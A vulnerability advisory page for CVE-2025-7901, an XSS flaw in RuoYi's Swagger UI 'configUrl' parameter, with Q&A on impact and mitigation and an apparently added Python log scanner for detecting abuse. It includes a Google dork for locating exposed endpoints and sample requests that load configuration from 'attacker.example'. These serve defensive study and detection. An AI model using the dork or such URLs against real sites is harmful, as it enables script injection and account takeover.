CVE-2025-7901
BaseFortify
Publication date: 2025-07-20
Last updated on: 2025-09-11
Assigner: VulDB
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| ruoyi | ruoyi | up to 4.8.1 (inclusive) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-7901 is a DOM-based Cross-Site Scripting (XSS) vulnerability in yangzongzhuan RuoYi versions up to 4.8.1, specifically affecting the Swagger UI component at /swagger-ui/index.html. The vulnerability arises from improper access control and handling of the user-controllable argument 'configUrl', which is not properly sanitized before being embedded in the web page. This allows attackers to inject and execute malicious JavaScript in the victim's browser. Additionally, an Insecure Direct Object Reference (IDOR) flaw allows attackers to access internal API documentation without authentication, increasing the attack surface. The vulnerability exploits Swagger UI's feature to load external API specifications insecurely, leading to potential account takeovers or other attacks. [1, 2, 3]
How can this vulnerability impact me?
This vulnerability can impact you by allowing remote attackers to execute arbitrary scripts in your browser when accessing the affected Swagger UI interface. This can lead to unauthorized access to internal API documentation, compromise of data integrity, and potentially account takeovers or other malicious actions. Since the attack requires no authentication and can be initiated remotely, it poses a significant security risk, especially if users interact with the vulnerable Swagger UI endpoint. [1, 2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by identifying instances of the vulnerable Swagger UI endpoint exposed on your network or system. You can use Google dorking with the query `inurl:swagger-ui/index.html` to find potentially affected targets. Additionally, you can test the endpoint by accessing the URL with the `configUrl` parameter to see if it improperly executes scripts, for example by visiting `/swagger-ui/index.html?configUrl=<malicious_url>`. There are no specific commands provided, but scanning for the presence of the Swagger UI endpoint and testing the `configUrl` parameter for script injection can help detect the vulnerability. [2, 3]
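A defender-side complement to the above is to look for the abuse pattern in web server access logs rather than probing the endpoint. The script below is an added example, not code from the page, from BaseFortify or from the RuoYi project: it parses combined-format access log lines, picks out requests to the Swagger UI page, and flags any `configUrl` value that would make Swagger UI fetch its configuration from another origin (absolute URL or protocol-relative `//host/...`). The log lines, the IP addresses and the host `attacker.example` are constructed sample data; the list of Swagger UI paths and the `allowed_hosts` parameter are assumptions for the example, not something the page specifies.

```python
"""Flag access-log requests that point Swagger UI's configUrl at a foreign origin."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [20/Jul/2025:10:01:02 +0000] "GET /swagger-ui/index.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.11 - - [20/Jul/2025:10:01:05 +0000] "GET /swagger-ui/index.html?configUrl=/v3/api-docs/swagger-config HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Jul/2025:10:02:17 +0000] "GET /swagger-ui/index.html?configUrl=https%3A%2F%2Fattacker.example%2Fevil.json HTTP/1.1" 200 1532 "-" "curl/8.0"
198.51.100.7 - - [20/Jul/2025:10:02:20 +0000] "GET /swagger-ui/index.html?configUrl=//attacker.example/x.json HTTP/1.1" 200 1532 "-" "curl/8.0"
192.0.2.5 - - [20/Jul/2025:10:03:00 +0000] "GET /login HTTP/1.1" 200 410 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, identd, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed Swagger UI entry points worth watching (the page names the first one).
SWAGGER_PATHS = ("/swagger-ui/index.html", "/swagger-ui.html")


def classify_config_url(value):
    """Return 'external' if Swagger UI would fetch this value from another origin,
    otherwise 'relative' (a same-origin path such as /v3/api-docs/...)."""
    parts = urlsplit(value.strip())
    # A scheme (https:, data:, ...) or a netloc (protocol-relative //host) leaves the origin.
    if parts.scheme or parts.netloc:
        return "external"
    return "relative"


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(log_text, allowed_hosts=()):
    """Return one finding per configUrl seen on a Swagger UI request.

    allowed_hosts: lower-case hostnames that are legitimately permitted as spec
    sources (assumed parameter); anything else off-origin is rated 'high'.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        target = urlsplit(rec["target"])
        if target.path not in SWAGGER_PATHS:
            continue
        # parse_qs percent-decodes, so encoded https%3A%2F%2F... is handled too.
        for value in parse_qs(target.query, keep_blank_values=True).get("configUrl", []):
            origin = classify_config_url(value)
            host = (urlsplit(value.strip()).hostname or "").lower()
            severity = "high" if origin == "external" and host not in allowed_hosts else "info"
            findings.append({
                "ip": rec["ip"],
                "time": rec["ts"],
                "path": target.path,
                "configUrl": value,
                "origin": origin,
                "severity": severity,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['severity']:4} {f['ip']:14} {f['time']} {f['path']} configUrl={f['configUrl']}")
```

Running the script on the sample lines reports the same-origin `configUrl` as informational and the two requests that reference `attacker.example` as high-severity; in practice you would feed the real access log to `scan_access_log` and pass any hosts you deliberately serve API specs from in `allowed_hosts`.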
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the Swagger UI endpoints to authorized users only, as the vulnerability arises from improper access control. Since no known effective mitigations or patches currently exist, consider disabling or removing the Swagger UI component if possible. Alternatively, replace the affected Swagger UI component with a secure alternative that properly sanitizes input parameters like `configUrl`. Monitoring and limiting exposure of internal API documentation interfaces is also recommended. [1, 2, 3]